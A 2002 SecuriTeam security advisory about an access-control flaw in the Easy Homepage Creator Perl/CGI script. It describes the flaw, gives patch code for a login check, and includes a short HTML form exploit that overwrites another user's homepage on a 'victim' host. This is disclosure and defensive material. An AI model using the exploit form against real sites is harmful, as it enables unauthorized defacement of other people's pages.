[UNIX] Easy Homepage Creator Vulnerability

From: support@securiteam.com
Date: 07/29/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Mon, 29 Jul 2002 07:49:31 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Easy Homepage Creator Vulnerability
------------------------------------------------------------------------

SUMMARY

The <http://www.easyscripts.co.uk/hc_index.htm> Easy Homepage Creator is
perl/cgi program that allows your website visitors to signup for their
very own homepage on your website. A security vulnerability in the product
allows anyone to change another user homepage without being required to
have any special security privileges.

DETAILS

Vulnerable systems:
 * Advanced Easy Homepage Creator version1.0
 * Easy Homepage Creator version 1.0

Solution:
Add Access Validation to the "print_html_to_file" function.

Add to edit.cgi the following code:
  sub login_check
  {
     if ($FORM{'username'} eq "" or $FORM{'password'}
eq "")
     {
             dienice("Sorry, but you haven't entered a Username or
Password. Please press the 'back' button on your browser to return to the
login screen.");
     }
     $FORM{'username'} =~ tr/A-Z/a-z/;
     $FORM{'password'} =~ tr/A-Z/a-z/;
     
    open(PROFILE,"<$rootdir/profiles/$FORM{'username'}.pro") ||
dienice("Sorry, but you have entered an invalid username or password.
Please press the 'back' button on your browser to return to the login
form.");
     @DATA = <PROFILE>;
     chomp(@DATA);
     if (!($FORM{'username'} eq "@DATA[1]" && $FORM{'password'} eq
"@DATA[2]")
     {
             dienice("Sorry, but you have entered an invalid username or
password. Please press the 'back' button on your browser to return to the
Login Form and try logging-in again.");
     }
     close(PROFILE);

    open(CHECK_USERNAME,"<$rootdir/profiles/ban_users.dat") ||
dienice("Configuration Error! Unable to open ban_users.dat file for
reading. Please contact the webmaster of this web site. The following
error occured : $!");
     @check = <CHECK_USERNAME>;
     chomp(@check);
     close(CHECK_USERNAME);
     
     foreach $line (@check)
     {
       if ($line =~ /$FORM{'username'}/gi)
       {
              dienice("Sorry, but you have been banned from using the
Homepage Creator. You should have been sent an email explaining why you
have been banned from using the Homepage Creator. For more details contact
the webmaster of this web site.");
       }
     }
  }

  sub dienice
  {
     my($msg) = @_;
     print <<EndHTML;
     <html>
     <head>
     <title>Homepage Login Error</title>
     </head>
     <body bgcolor="$bg_colour" link="$hyperlinks_colour"
vlink="$hyperlinks_colour" alink="$hyperlinks_colour">
     <p align="center">$logo_url $banner_url</p>
     <hr color="$linebreakcolour">
     <p align="left"><b><font face="Times New Roman" color="$title_colour"
size="5"> Homepage Login Error</font></b></p>
     <p align="left"><font face="Verdana" size="2"
color="$field_text_colour"><b>$msg</b></font></p>
     <hr color="$linebreakcolour">
     <p align="center"><font size="1" face="Verdana"
color="$field_text_colour"><b>) Copyright
     <a href="http://www.easyscripts.co.uk">
     Easy Scripts Archive</a> 2001. All Rights Reserved.</b></font></p>
     </body>
     </html>
     EndHTML
     exit;
  }

And on the first line of "print_html_to_file" function add this:
&login_check;

Exploit:
<!--
Easy Homepage Creator Vulnerability

Date : July 18, 2002
Severity : High (Possible to edit member homepage)
Systems Affected:
        Advanced Easy Homepage Creator v1.0
        Easy Homepage Creator v1.0

Vendor URL: http://www.easyscripts.co.uk
Vuln Type : It does not use Access Validation to edit homepage
Author : AresU
Greetz to : Bosen, Tioeuy, eF73, SakitJiwa, nimdA, FreshFirst, Algorithm,
Mr.Padang
Adv.URL : http://bosen.net/advisories/aresu-adv.001.txt
This source code is for educational purpose ONLY
-->

<html><center>
<h1>Easy Homepage Creator Vulnerability</h1>
<table border=0 cellpadding=2 cellspacing=1 width="90%">
<FORM method="POST" name=edit action="http://victim/homepage/edit.cgi">
Username: <input name="username"><br>
You can edit other user homepage below :
<textarea rows="17" id="homepage_edit" name="homepage_edit" cols="88">
Please type your messages in here.
</textarea>
<tr>
    <td class=top>
    <input class=button type="submit" value="Edit Homepage"
name="edit_homepage"></td>
</tr>
</FORM>
</table>
</html>

ADDITIONAL INFORMATION

The information has been provided by <mailto:ar3su@yahoo.com> Arek
Suroboyo.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages